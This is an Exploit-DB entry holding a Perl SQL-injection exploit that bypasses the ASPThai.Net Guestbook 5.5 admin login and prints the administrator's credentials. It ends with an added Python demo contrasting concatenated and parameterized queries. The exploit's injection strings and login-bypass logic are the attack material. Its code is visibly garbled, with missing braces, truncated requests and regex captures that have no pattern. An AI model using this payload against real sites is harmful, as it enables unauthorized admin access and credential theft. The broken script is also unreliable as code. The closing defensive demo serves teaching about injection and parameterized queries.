ASPThai.Net Guestbook <= 5.5 Auth Bypass SQL Injection Exploit

ID EDB-ID:1472
Type exploitdb
Reporter Zodiac
Modified 2006-02-06T00:00:00


ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit. Webapps exploit for asp platform

# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5  
#(And possibly higher; could not find a site to test it on)
# This exploit shows the username of the administrator and the password in plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# #g00ns  email =
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;

$Server = $ARGV[0];

if($Server =~m/http/g)
$Server=~ 'http://$Server';
else {
  print $error;

if(!$Server) {usage();exit() ;}


print "\r\nGrabbing Username And Password\r\n\n";

# Logs in and stores a cookie to view the admin panel later

 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();


 $res = $xpl->post(
 Content => [ 

	'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', 
	'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
	'Submit' => '-= Login =-',

# Create a request
my $req = HTTP::Request->new(GET => 



$req->header('Referer', $Server.'admin_menu.asp');

my $res = $xpl->request($req);

$info = $res->content;

if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) 
 die "Error Connecting...\r\n"; 

#Check the outcome of the response

$User = $2;
$Pass= $2;

print "UserName:$User\r\nPassword:$Pass\r\n";

sub head()
 print "\n=======================================================================\r\n";
 print "* ASPThai.Net Guestbook version 5.5 SQL Injection by *\r\n";   
 print "=======================================================================\r\n";
sub usage()
 print " Usage: <Site>  \r\n\n";
 print " <Site> - Full path to Guestbook e.g. \r\n";
 print "=======================================================================\r\n";
 print "   -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
 print " #g00ns\r\n";
 print "=======================================================================\r\n";

# [2006-02-06]
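
An auth-bypass injection of this kind works when the login query is assembled by string concatenation from the txtUserName and txtUserPass fields. The following is an added example, not part of the original exploit or of the ASPThai.Net code: the table name, column names and query shape are assumptions, and the database is a constructed in-memory SQLite stand-in. It runs the form value shown above against a concatenated query and against the same query with bound parameters.

```python
import sqlite3
from urllib.parse import unquote

# Form value exactly as it appears in the script above (percent-encoded "g00ns").
PAGE_PAYLOAD = "' or '%67%30%30%6e%73'='%67%30%30%6e%73"

def make_db():
    """Constructed stand-in for the admin table; schema and row are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'constructed-secret')")
    return db

def login_concatenated(db, user, password):
    """Assumed vulnerable pattern: form values pasted into the SQL text."""
    sql = ("SELECT username FROM admin WHERE username = '" + user +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()

def login_parameterized(db, user, password):
    """Hardened form: values are bound, so quotes inside them stay data."""
    sql = "SELECT username FROM admin WHERE username = ? AND password = ?"
    return db.execute(sql, (user, password)).fetchone()

if __name__ == "__main__":
    db = make_db()
    # Check both the literal value and its percent-decoded form: the two quoted
    # strings are identical either way, so the comparison is always true.
    for value in (PAGE_PAYLOAD, unquote(PAGE_PAYLOAD)):
        print(repr(value))
        print("  concatenated :", login_concatenated(db, value, value))
        print("  parameterized:", login_parameterized(db, value, value))
```

Because AND binds tighter than OR, the concatenated WHERE clause ends in a standalone always-true comparison and matches every row; with bound parameters the same input is only compared as a literal string and matches nothing.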